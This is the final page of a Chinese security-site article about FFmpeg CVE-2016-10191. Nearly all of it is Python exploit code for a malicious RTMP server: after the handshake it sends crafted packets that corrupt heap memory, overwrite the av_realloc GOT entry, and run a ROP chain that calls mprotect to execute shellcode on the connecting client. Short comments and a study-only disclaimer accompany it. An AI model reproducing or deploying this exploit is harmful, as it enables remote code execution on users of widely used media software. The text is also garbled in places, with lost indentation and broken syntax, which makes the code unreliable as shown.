欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

FFmpeg破绽漏洞bug研究及运用,漏洞编号:CVE-2016-10191

来源:本站整理 作者:佚名 时间:2017-09-21 TAG: 我要投稿
data += p64(write_location) # write_location - data
 
data += p32(size) # size
data += p32(0) # offset
data += p64(0x180) # read
return data
 
def p24(data):
packed_data = p32(data, endian='big')[1:]
assert(len(packed_data) == 3)
returnpacked_data
 
 
defhandle_request(client_socket):
    v = client_socket.recv(1)   #接管握手包C0
client_socket.send(p8(3))   #发送握手包S0, 版本号
 
payload = ''
    payload += '\x00' * 4   #好像是 timestamp,没甚么卵用
    payload += '\x00' * 4   #这四个字节是 Server 的版本号,这里设置为全0,避免客户端走校验的流程
    payload += os.urandom(1536 - 8) #剩下的都随机天生
client_socket.send(payload) #发送握手包S1
client_socket.send(payload) #发送握手包S2
 
client_socket.recv(1536) #接管握手包C1
client_socket.recv(1536) #接管握手包C2
以上便是全部握手进程
print 'sending payload'
payload = create_payload(0xa0, 'U' * 0x80, 4)
client_socket.send(payload)
 
payload = create_payload(0xa0, 'A' * 0x80, 20)
client_socket.send(payload)
 
data = ''
data += 'U' * 0x20 # the rest of chunk
data += p64(0)     # zerobytes
    data += p64(0x6a1) # real size of chunk, 这一行size 能够必要依据现实情况变动
data += p64(add_esp_f8) # trampoline to rop
    data += 'Y' * (0x30 - 8) # channel_zero, 添补RTMPPacket[0]
    data += 'Y' * 0x20 # channel_one, 添补部门RTMPPacket[1]
 
payload = create_payload(0x2000, data, 4)
client_socket.send(payload) #到这一步程式并无瓦解
data = ''
data += 'I' * 0x10 # fill the previous RTMPPacket[1]
    #data += p64(add_rsp_a8)
 
data += create_rtmp_packet(2, got_realloc)
    data += 'D' * (0x80 - len(data)) #添补到0x80个字节
 
payload = create_payload(0x1800, data, 4)
client_socket.send(payload)
 
把 got 表中av_realloc改写
jmp_to_rop = ''
jmp_to_rop += p64(mov_rsp_rax)
jmp_to_rop += 'A' * (0x80 - len(jmp_to_rop))
payload = create_payload(0x1800, jmp_to_rop, 2)
client_socket.send(payload)
 
rop = ''
rop += 'AAAAAAAA' * 6 # padding
 
rop += p64(pop_rdi)
rop += p64(shellcode_location) #shellcode不放在堆上是由于难以 leak 堆地点?
rop += p64(pop_rsi)
rop += p64(0x1000)
rop += p64(pop_rdx)
rop += p64(7)
rop += p64(plt_mprotect)
    #mprotect(shellcode_location, 0x1000, 7)
 
write_location = shellcode_location
shellslices = map(''.join, zip([iter(shellcode)]8)) #将shellcode以8个字节为1组打包
 
    for shell in shellslices:   #把shellcode经由进程rop的方法写入
rop += p64(pop_rax)
rop += p64(write_location)
rop += p64(pop_rsi)
rop += shell
rop += p64(mov_gadget)
 
write_location += 8
 
rop += p64(shellcode_location)
rop += 'X' * (0x80 - (len(rop) % 0x80)) #0x80个字节对齐
 
rop_slices = map(''.join, zip([iter(rop)]0x80)) #将rop以0x80个字节为1组打包
for data in rop_slices:
payload = create_payload(0x2000, data, 4)
client_socket.send(payload)
 
    # does not matter what data to send because we try to trigger
    # av_realloc function inside ff_rtmp_check_alloc_array
    # so that av_realloc(our_data) shall be called
payload = create_payload(1, 'A', 63)
client_socket.send(payload)
 
sleep(3)
print 'sending done'
    #raw_input("wait for user interaction.")
client_socket.close()
 
if name == 'main':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
s.bind((bind_ip, bind_port))
s.listen(5)
 
while True:
print 'Waiting for new client...'
client_socket, addr = s.accept()
handle_request(client_socket)

上一页  [1] [2] [3] 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载